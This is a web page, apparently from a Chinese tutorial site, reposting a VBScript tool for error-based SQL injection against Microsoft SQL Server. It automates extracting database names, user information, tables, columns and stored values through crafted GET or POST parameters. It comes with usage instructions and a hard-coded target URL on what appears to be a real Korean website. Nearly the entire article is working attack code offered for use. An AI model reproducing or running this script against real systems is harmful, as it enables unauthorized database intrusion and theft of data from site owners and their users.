当前位置: 首页 > 图文教程 > 数据库 > MSSQL > Sql2005注射辅助脚本[粗糙版]

MSSQL
SQL Server教程:备份和恢复措施
合理建立索引-提高SQL Server的性能之法
SQL Server查询过程中 实际消耗了多大内存?
教程:SQL Server 2008 数据挖掘的概念
在SQL Server中生成脚本的方法
如何提高SQL Server复制的向后兼容性
为SQL Server 2008添加报表服务的虚拟目录
在SQL Server中创建全局临时表
SQL Server触发器的使用方法
如何通过调整Windows参数提高数据库服务器性能
详解SQL Server 2005 FOR XML嵌套查询的使用
初识Sybase数据库
浅谈SQL Server Compact的DLL文件
丢失的数据忘记备份怎么办?
SQLServer数据库中如何保持数据一致性
教你解决SQLServer与服务器连接时出错
SQLServer中游标是如何处理数据的?
SQL Sever性能怎样全方位诊断?
SQL Server教程:详细学习游标
详解SQLServer 存储过程

MSSQL 中的 Sql2005注射辅助脚本[粗糙版]


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 119 ::
收藏到网摘: n/a

'Sql2005注射辅助脚本[粗糙版] 用于mssql显错模式 By Tr4c3[at]126[Dot]com '亦适用于MSSQL 2000的注射,不过2000还是用nbsi和Pangolin。 作者:Tr4c3
'为了保持脚本的通用性,放弃了 and (select col_name(object_id('TableName'),N))=0这样的用法。
'欲返回韩文等字符可修改121或者136行,更多的设置要自己修改
'更多功能请大家自己加入
Const method = "Get" '提交方式请修改此处,有get和post可选
Const DisPlay = "D" 'S 保存到文件,D输出到屏幕
Dim strUrl_B, strUrl, i, k, MyArray, strArg, strD
strUrl_B = "http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120'" '基于注射点的不确定性,此处请手工更改
i = 1 '库的基数
k = 0 '表和字段的基数
MyArray = Split(strUrl_B, "?", -1, 1)
strUrl = MyArray(0) '取url
strArg = MyArray(1) '取参数
Set Args = Wscript.Arguments
If Args.Count = 0 Then
ShowU
End If
'If Args.Count =1 And LCase(Args(0))
'************************************************************************
' 爆库
'************************************************************************
If Args.Count =1 Then
If LCase(Trim(Args(0)))="databases" Then
ResuT("---------------===============================--------------")
ResuT("All The DataBases:")
Do
strData = " and quotename(db_name("&i&"))=0--"
sqlInj(strData)
i = i + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
ElseIf LCase(Trim(Args(0)))= "info" then
ResuT("---------------===============================--------------")
ResuT("The Current Database is:")
strData = " and quotename(db_name())=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
ResuT("The database User is:")
strData = " and quotename(user)=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
ResuT("The System_user is:")
strData = " and quotename(System_user)=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
Wscript.Quit
End If
End If
'************************************************************************
' 爆表
'************************************************************************
If Args.Count=2 And LCase(Trim(Args(1)))="tables" Then
ResuT("---------------===============================--------------")
ResuT("The Tables Of " & Args(0))
Do
strData = " and (select top 1 quotename(name) from "& Args(0) & ".dbo.sysobjects where xtype=char(85) AND name not in (select top "& k &" name from "&Args(0)&".dbo.sysobjects where xtype=char(85)))=0--"
sqlInj(strData)
k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If
'************************************************************************
' 爆字段
'************************************************************************
If Args.Count=3 And LCase(Trim(Args(2)))="cols" Then
Database = Args(0)
Table = Args(1)
TarGet = DataBase & ".dbo." & Table
TarGetCol = Database & ".DBO.SYSCOLUMNS"
ResuT("---------------===============================--------------")
ResuT("The Columns Of " & TarGet)
Do
strData = " and (select top 1 Quotename(name) from "& TarGetCol &" where id=object_id('"& TarGet &"') and name not in (select top "&k&" name from "& TarGetCol &" where id=object_id('"& TarGet &"')))=0--"
sqlInj(strData)
k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If
'************************************************************************
' 爆字段值
'************************************************************************
If Args.Count=4 And LCase(Trim(Args(3)))="values" Then
Database = Args(0)
Table = Args(1)
col = Args(2)
Target = Database & ".dbo." & Table
ResuT("---------------===============================--------------")
ResuT("The Values Of " & Args(2) & " in "&Target)
Do
strData = " and (select top 1 quotename("& col &") from "& Target & " where "& col &" not in (select top "& k &" "& col &" from "& Target &"))=0--"
sqlInj(strData)
k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If
Sub SqlInj(value)
If UCase(method) = "GET" Then
value = strArg & value
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "GET", strUrl &"?" & value , False
objXML.SetRequestHeader "Referer", strUrl
'objXML.SetRequestHeader "Accept-Language", "EUC-KR"
objXML.send()
strRevS = objXML.ResponseText '默认用这个
'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个
If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
ResuT(" |_"&strD)
Else
strD = ""
End If
ElseIf UCase(method) = "POST" Then
value = strArg & value
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "POST", strUrl, False
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "Referer", strUrl
objXML.send(UrlEncode(value))
strRevS = objXML.ResponseText '默认用这个
'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个
If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
ResuT(" |_"&strD)
Else
strD = ""
End If
End If
End Sub
Function ResuT(strInfo)
If UCase(DisPlay) = "S" Then
Set fso = CreateObject("Scripting.FileSystemObject")
Set fso1 = fso.OpenTextFile("result.txt",8,True)
fso1.WriteLine(strInfo)
fso1.Close
Set fso = Nothing
ElseIf UCase(DisPlay) = "D" Then
Wscript.Echo(strInfo)
End If
End Function
Function UrlEncode(str)
str = Replace(str," ","+")
UrlEncode = str
End Function
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Sql2005注射辅助脚本(粗糙版),用于mssql显错模式 By Tr4c3[at]126[Dot]com")
.Echo("Usage:")
.Echo(" cscript"&.ScriptName&" info--爆基本信息")
.Echo(" cscript"&.ScriptName&" databases--爆所有库名")
.Echo(" cscript"&.ScriptName&" pubs tables--爆库pubs里所有用户表名")
.Echo(" cscript"&.ScriptName&" pubs authors cols--爆库pubs里authors表的所有字段名")
.Echo(" cscript"&.ScriptName&" pubs authors au_id values--爆pubs.dbo.authors里au_id的值")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub